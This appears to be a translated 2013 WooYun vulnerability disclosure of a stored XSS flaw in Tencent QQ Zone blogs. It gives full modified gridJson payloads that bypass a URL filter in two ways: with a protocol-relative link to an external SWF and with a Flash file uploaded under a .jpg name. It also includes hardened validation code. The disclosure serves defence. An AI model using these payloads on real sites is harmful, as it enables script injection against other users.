Vulnerability summary (24 followers)

Defect ID: wooyun-2013-021018

Title: A flaw in a QQ空间 (QQ Zone) feature leads to stored XSS in blog entries - 11

Vendor: Tencent

Author: gainover

Submitted: 2013-03-31 15:10

Fixed: 2013-05-15 15:10

Disclosed: 2013-05-15 15:10

Vulnerability type: XSS (cross-site scripting)

Severity: High

Self-assessed Rank: 15

Status: confirmed by the vendor

Source: http://www.wooyun.org, for questions or help contact [email protected]

Tags:


Vulnerability details

Disclosure status:

2013-03-31: Details sent to the vendor, awaiting vendor handling
2013-04-01: Vendor confirmed; details disclosed to the vendor only
2013-04-11: Details disclosed to core white hats and domain experts
2013-04-21: Details disclosed to regular white hats
2013-05-01: Details disclosed to intern white hats
2013-05-15: Details disclosed to the public

Summary:

Several days have passed, and today I had a little free time, so I went to see how well Tencent had fixed the previous report. The result: it was fixed, but the mistake from the earlier fix appeared again, and the fix approach I worried about in the remediation advice for part 9 of this series also appeared. So the problem still exists. A few days ago a fellow researcher submitted a vulnerability on WooYun that Tencent dismissed as "not a hazard"; here I turn that waste into treasure and use it to bypass Tencent's filter, which works rather nicely~

Detailed description:

1. As can be seen, following the remediation advice, Tencent now validates the URL passed to load with a checkURL function.

[screenshot: 1.jpg]


The check above is clearly flawed.
2. On one hand, the developers again used a regex anchored on a leading / as the test for a relative path, a mistake already made before.
As in part 9 of this series, //xsst.sinaapp.com/Xss.swf bypasses it.
When publishing the blog entry, modify the gridJson field as follows:

{"g1":{"visible":1,"id":1,"content":{"mood":"","image":"","date":"","text":"1"},"type":1,"title":"???С???????"},"g0":{"visible":1,"id":0,"content":{"mood":"","image":"","date":"","text":"1"},"type":1,"title":"???????????"},"g8":{"visible":1,"id":8,"content":{"mood":"","image":"","date":"","text":"1"},"type":1,"title":"????????2012??"},"g2":{"visible":1,"id":2,"content":{"mood":"","image":"","date":"","text":"1"},"type":1,"title":"???????"},"g6":{"visible":1,"id":6,"content":{"mood":"","image":"","date":"","text":"1"},"type":1,"title":"????????"},"templateName":"??????","g7":{"visible":1,"id":7,"content":{"mood":"","image":"","date":"","text":"1"},"type":1,"title":"???????"},"g4":{"visible":1,"id":4,"content":{"mood":"","image":"","date":"2013-03-26&1","text":""},"type":0,"title":"???? 2013-3-26"},"g3":{"visible":1,"id":3,"content":{"mood":"","image":"","date":"","text":"1"},"type":1,"title":"????????"},"version":"1.2","g5":{"visible":1,"id":5,"content":{"mood":"","image":"//xsst.sinaapp.com/Xss.swf","date":"","text":""},"type":2,"title":"??????????"},"tempId":47,"bgItem":{"bgId":"87","bgURL":"/qzone/newblog/v5/flashassets/bg87.swf?bgver=1.0&max_age=31104000","gridcolor":"0xFF3300","alpha":1,"align":"right","wordcolor":"0xCC0000"}}


3. On the other hand, in the remediation advice for part 9 I already said it is best not to use a *.qq.com/... pattern to decide whether a resource URL is external.
It turns out that is exactly how the check is done here, so I give a simple bypass.
A few days ago Tencent dismissed a file-upload vulnerability; we put it to use here.

[screenshot: 0.jpg]


As shown, we successfully uploaded a Flash file with a .jpg extension; Tencent does not check the file content here, only the extension.

[screenshot: 2.jpg]


Set the image URL to the newly uploaded address: http://data1.class.qq.com/funshow/2013-03-31/s_13647082964440.jpg#.swf
When publishing the blog entry, modify the gridJson field as follows:

{"g1":{"visible":1,"id":1,"content":{"mood":"","image":"","date":"","text":"1"},"type":1,"title":"???С???????"},"g0":{"visible":1,"id":0,"content":{"mood":"","image":"","date":"","text":"1"},"type":1,"title":"???????????"},"g8":{"visible":1,"id":8,"content":{"mood":"","image":"","date":"","text":"1"},"type":1,"title":"????????2012??"},"g2":{"visible":1,"id":2,"content":{"mood":"","image":"","date":"","text":"1"},"type":1,"title":"???????"},"g6":{"visible":1,"id":6,"content":{"mood":"","image":"","date":"","text":"1"},"type":1,"title":"????????"},"templateName":"??????","g7":{"visible":1,"id":7,"content":{"mood":"","image":"","date":"","text":"1"},"type":1,"title":"???????"},"g4":{"visible":1,"id":4,"content":{"mood":"","image":"","date":"2013-03-26&1","text":""},"type":0,"title":"???? 2013-3-26"},"g3":{"visible":1,"id":3,"content":{"mood":"","image":"","date":"","text":"1"},"type":1,"title":"????????"},"version":"1.2","g5":{"visible":1,"id":5,"content":{"mood":"","image":"http://data1.class.qq.com/funshow/2013-03-31/s_13647082964440.jpg#.swf","date":"","text":""},"type":2,"title":"??????????"},"tempId":47,"bgItem":{"bgId":"87","bgURL":"/qzone/newblog/v5/flashassets/bg87.swf?bgver=1.0&max_age=31104000","gridcolor":"0xFF3300","alpha":1,"align":"right","wordcolor":"0xCC0000"}}


As shown, when the blog entry is opened, the uploaded file is loaded successfully and the XSS executes.

[screenshot: 3.jpg]
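To make the two flaws concrete, here is an added example (not WooYun's, gainover's or Tencent's code) that puts an illustrative reconstruction of the described checks beside a version that parses the URL and compares the host exactly; the ORIGIN and ALLOWED_HOSTS values are assumptions, while the sample URLs are taken from the report's gridJson.

```javascript
// Added example for this report, not the vendor's actual checkURL implementation.
// weakCheckURL reconstructs the two checks the report describes; checkURL is the
// hardened form. ORIGIN and ALLOWED_HOSTS are assumed values, not from the report.

const ORIGIN = "https://qzone.qq.com";                    // assumed page origin
const ALLOWED_HOSTS = new Set(["assets.example.qq.com"]); // hypothetical asset host

// Reconstruction of the flawed logic: "starts with /" is taken as a relative
// path, and any host matching *.qq.com/ is trusted.
function weakCheckURL(candidate) {
  return /^\//.test(candidate) ||
         /^https?:\/\/([\w-]+\.)*qq\.com\//i.test(candidate);
}

// Hardened form: resolve against the page origin, then inspect the parsed parts.
function checkURL(candidate) {
  if (typeof candidate !== "string" || candidate === "") return false;
  let u;
  try {
    u = new URL(candidate, ORIGIN); // "//host/x" resolves to https://host/x here
  } catch (e) {
    return false;                   // unparsable input is rejected, not guessed at
  }
  if (u.protocol !== "http:" && u.protocol !== "https:") return false;
  // Exact host match instead of a wildcard: the report shows a user-upload
  // host under qq.com serving an attacker-controlled SWF renamed to .jpg.
  const pageHost = new URL(ORIGIN).hostname;
  if (u.hostname !== pageHost && !ALLOWED_HOSTS.has(u.hostname)) return false;
  // Decide on the decoded path only; the "#.swf" fragment in the report is
  // never sent to the server and must not influence the check.
  return /\.swf$/i.test(u.pathname);
}

// Inputs taken from the report, plus the legitimate bgURL from the same gridJson.
const SAMPLES = [
  "//xsst.sinaapp.com/Xss.swf",
  "http://data1.class.qq.com/funshow/2013-03-31/s_13647082964440.jpg#.swf",
  "/qzone/newblog/v5/flashassets/bg87.swf?bgver=1.0&max_age=31104000",
];

function compare(urls) {
  return urls.map((url) => ({ url, weak: weakCheckURL(url), strict: checkURL(url) }));
}

for (const row of compare(SAMPLES)) {
  console.log(`weak:${row.weak ? "PASS" : "FAIL"} strict:${row.strict ? "PASS" : "FAIL"} ${row.url}`);
}
```

Both bypass URLs pass the reconstructed check and fail the hardened one, while the legitimate relative bgURL passes both.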

Proof of vulnerability:

See the detailed description.

Remediation:

See part 9 of this series.

Copyright notice: please credit the source gainover@乌云 when reposting.


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 15

Confirmed: 2013-04-01 09:56

Vendor reply:

Thanks, it is being handled.

Latest status:

None yet